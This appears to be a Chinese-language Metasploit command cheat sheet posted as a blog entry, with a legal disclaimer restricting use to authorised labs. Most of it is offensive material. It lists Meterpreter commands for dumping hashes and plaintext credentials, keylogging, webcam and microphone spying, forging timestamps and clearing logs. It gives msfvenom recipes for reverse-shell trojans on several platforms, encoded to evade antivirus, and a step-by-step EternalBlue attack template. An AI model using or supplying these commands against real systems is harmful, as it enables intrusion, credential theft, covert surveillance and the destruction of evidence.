法律合规声明
本文档所有命令、操作教程,仅可用于个人授权靶场、企业内部安全测试、网络安全学习考证场景。未经授权对任何第三方设备、服务器、网络系统进行渗透、探测、入侵操作,均违反《中华人民共和国网络安全法》《中华人民共和国刑法》,属于违法犯罪行为,使用者需承担全部法律责任,作者与文档概不负责。
适用场景:Vulnhub靶机、Metasploitable、CTF竞赛、本地自建测试环境、企业授权安全巡检。
第一章 MSFConsole 控制台核心基础命令
1.1 启动、退出与基础查看命令
msfconsole # 正常启动Metasploit控制台
msfconsole -q # 静默启动,跳过欢迎界面
msfconsole -r xxx.rc # 启动后自动执行指定RC脚本(批量自动化操作)
exit / quit # 退出MSF控制台
clear # 清空控制台屏幕
version # 查看MSF框架版本、编译信息
help / ? # 查看所有内置命令总帮助
help 指令名 # 单独查询某一条命令的详细用法
history # 查看本次控制台所有输入命令历史1.2 参数配置命令(全局/局部)
核心区分:局部参数仅当前模块生效,全局参数所有模块通用
set 变量名 数值 # 设置当前模块局部参数(最常用:RHOST、LHOST、LPORT)
setg 变量名 数值 # 设置全局参数,永久生效(重启控制台仍保留)
unset 变量名 # 取消单个局部参数配置
unsetg 变量名 # 取消单个全局参数配置
unset all # 清空当前模块所有局部参数
get 变量名 # 查看单个局部参数配置值
getg 变量名 # 查看单个全局参数配置值
show options # 查看当前模块所有必填、可选参数
show advanced # 查看当前模块高级隐藏参数1.3 模块检索、加载与信息查看
search 关键词 # 搜索漏洞、模块、载荷,支持多条件筛选
# 精准搜索语法示例
search ms17-010 # 根据漏洞编号搜索
search type:exploit # 只搜索漏洞利用模块
search type:auxiliary # 只搜索辅助扫描模块
search platform:windows # 只搜索Windows平台模块
search cve:2023 # 根据CVE编号搜索对应漏洞
use 模块完整路径 # 加载指定模块,进入模块操作模式
back # 退出当前模块,返回控制台根目录
info # 查看当前模块详情:漏洞简介、适用系统、参数、作者、参考链接
check # 无损检测目标是否存在对应漏洞(仅探测,不攻击)1.4 攻击执行与后台任务管理
exploit # 执行漏洞渗透攻击(exploit模块专用)
exploit -j # 后台运行攻击任务,不阻塞控制台
exploit -z # 攻击成功获取会话后,不自动进入交互界面
run # 等同于exploit,辅助模块、自定义模块通用
jobs # 查看所有后台运行的任务
jobs -l # 查看后台任务详细信息
jobs -k 任务ID # 终止指定ID的后台任务
jobs -K # 强制杀死所有后台任务1.5 Show 全系列查询命令(完整合集)
show exploits # 列出所有漏洞利用模块
show auxiliary # 列出所有辅助扫描、探测、爆破模块
show payloads # 列出所有系统、平台反弹Shell载荷
show encoders # 列出所有免杀编码工具
show nops # 列出空指令填充模块(用于免杀对齐)
show evasion # 列出所有免杀绕过模块
show targets # 查看当前漏洞支持的系统版本、目标类型
show options # 查看当前模块基础参数
show advanced # 查看当前模块高级参数
show missing # 查看当前模块缺失的依赖环境
show sessions # 查看所有已获取的被控会话
show hosts # 数据库中已扫描存活的主机列表
show services # 数据库中记录的端口、服务、版本信息
show vulns # 数据库中扫描到的目标漏洞信息
show creds # 数据库中存储的账号、密码凭证
show db_status # 查看MSF数据库连接状态
show db_imports # 查看数据库导入记录1.6 数据库与工作区管理命令
db_init # 初始化MSF内置PostgreSQL数据库
db_connect # 手动连接数据库
db_status # 查看数据库连接状态
db_disconnect # 断开数据库连接
db_nmap 扫描参数 # 调用Nmap扫描,结果自动存入数据库
db_import 文件名 # 导入外部扫描报告(xml等格式)
db_export 文件名 # 导出数据库扫描记录
workspace # 查看所有工作区
workspace -a 名称 # 新建自定义工作区
workspace -d 名称 # 删除指定工作区
workspace 名称 # 切换至指定工作区
workspace -h # 查看工作区帮助1.7 会话管理核心命令(拿到Shell必备)
sessions # 查看所有存活被控会话
sessions -i # 交互式列出所有会话详情
sessions -i 会话ID # 进入指定ID的Meterpreter交互会话
sessions -k 会话ID # 强制关闭单个指定会话
sessions -K # 批量关闭所有会话
sessions -u 会话ID # 将普通CMD Shell升级为Meterpreter高级会话
sessions -r # 开启会话路由转发
sessions -s 脚本.rc # 对所有在线会话批量执行脚本
background / bg # 将当前交互会话后台挂起,返回MSF控制台第二章 Meterpreter 后渗透全套命令(最高权限操作)
2.1 双端目录文件操作(攻击机+靶机)
区分:无l前缀=操作靶机,有l前缀=操作本地攻击机
# 靶机文件操作
pwd # 查看靶机当前工作目录
cd 目录路径 # 切换靶机工作目录
ls # 列出靶机当前目录所有文件、文件夹
cat 文件名 # 读取靶机文件内容
edit 文件名 # 编辑靶机文件(支持代码、文本文件)
mkdir 文件夹名 # 在靶机新建文件夹
rm 文件名 # 删除靶机指定文件
rmdir 文件夹名 # 删除靶机指定空文件夹
# 攻击机本地操作
lpwd / getlwd # 查看攻击机当前目录
lcd 目录路径 # 切换攻击机本地目录
# 文件传输与搜索
upload 本地文件 靶机路径 # 从攻击机上传文件至靶机
download 靶机文件 本地路径 # 从靶机下载文件至攻击机
search -d 目录 -f 后缀 # 全盘搜索靶机指定文件,例:search -d C:\ -f *.exe
# 痕迹伪装(时间戳伪造)
timestomp 文件名 -v # 查看文件原始时间戳
timestomp 文件名 -m "时间" # 修改文件修改时间
timestomp 目标文件 -f 模板文件 # 复制模板文件时间戳,完美伪装痕迹2.2 靶机系统信息查询命令
sysinfo # 查看靶机完整系统信息:系统版本、架构、CPU、主机名
getuid # 查看当前会话的靶机账号权限
getpid # 查看当前Meterpreter进程PID
ps # 列出靶机所有运行进程、PID、权限、路径
pidlist # 简洁版进程列表
ver # 查看Windows靶机系统详细版本
env # 查看靶机系统所有环境变量
ipconfig / ifconfig # 查看靶机网卡、IP、网关、DNS信息
route # 查看靶机路由表
arp # 查看靶机ARP缓存表
netstat -ano # 查看靶机端口连接、进程占用情况2.3 进程迁移与权限提升命令
getsystem # 自动尝试提升至系统最高SYSTEM权限
migrate 进程ID # 将当前会话迁移至指定进程(稳定会话、免杀)
migrate -N 进程名 # 根据进程名迁移会话
migrate -d # 自动迁移至稳定系统进程
kill 进程ID # 强制杀死靶机指定进程
execute # 在靶机执行程序
execute -f 程序名 # 前台执行程序
execute -f 程序名 -H # 隐藏后台执行程序2.4 密码抓取与凭证获取命令
hashdump # 抓取靶机系统所有用户密码哈希值
keyscan_start # 开启键盘记录
keyscan_dump # 导出键盘记录内容
keyscan_stop # 关闭键盘记录
# Mimikatz凭证抓取(kiwi模块)
load kiwi # 加载mimikatz模块
creds_all # 抓取所有系统明文账号密码
creds_msv # 抓取MSV凭证
creds_kerberos # 抓取Kerberos票据凭证
golden_ticket_create # 制作黄金票据(域环境)2.5 屏幕、设备监控命令
screenshot # 截取靶机当前屏幕画面
screenshare # 实时远程查看靶机屏幕
webcam_snap # 调用靶机摄像头拍照
webcam_stream # 实时调取靶机摄像头画面
record_mic # 录制靶机麦克风音频2.6 网络渗透与端口转发命令
portfwd add -l 本地端口 -p 靶机端口 -r 靶机IP # 端口转发,穿透内网
portfwd list # 查看所有转发端口
portfwd delete 端口 # 删除指定端口转发
route add 网段 子网掩码 会话ID # 添加内网路由,渗透内网其他主机
route print # 查看路由列表
route delete 网段 # 删除指定路由2.7 痕迹清除与会话控制命令
clearev # 清除靶机系统所有日志痕迹(安全留痕清理)
steal_token 进程ID # 窃取指定进程用户令牌,切换权限
rev2self # 恢复原始会话权限
exit # 退出当前Meterpreter会话(不关闭后台任务)第三章 Msfvenom 木马生成命令(全平台合集)
3.1 Windows 平台木马
# 64位反弹Shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=你的IP LPORT=端口 -f exe > shell.exe
# 32位反弹Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=端口 -f exe > shell.exe
# 无窗口后台运行版本
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f exe -e x86/shikata_ga_nai -i 5 > shell.exe3.2 Linux 平台木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > shell.elf3.3 Web 脚本木马
# PHP一句话/反弹木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f raw > shell.php
# ASP木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f asp > shell.asp3.4 Android 手机木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f apk > hack.apk第四章 经典完整攻击流程(示范模板)
# 1. 启动控制台
msfconsole -q
# 2. 搜索永恒之蓝漏洞
search ms17-010
# 3. 加载漏洞模块
use exploit/windows/smb/ms17_010_eternalblue
# 4. 设置目标IP
set RHOST 192.168.1.100
# 5. 加载反弹载荷
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 6. 设置攻击机监听IP和端口
set LHOST 192.168.1.50
set LPORT 4444
# 7. 检测漏洞
check
# 8. 执行攻击
exploit
# 9. 拿到会话后提权、抓密码
getsystem
hashdump
clearev第五章 高频报错与实用技巧
5.1 会话不稳定解决办法
1. 拿到会话后立即执行migrate 迁移进程,防止会话闪退;
2. 64位系统必须迁移至64位进程,否则无法加载kiwi抓取明文密码。
5.2 免杀基础优化
生成木马时添加编码参数:
-e x86/shikata_ga_nai -i 5 多重编码,规避基础杀毒查杀。5.3 内网渗透核心
获取外网靶机权限后,使用 route 添加内网路由,配合端口转发,横向渗透内网其他主机。
没有评论:
发表评论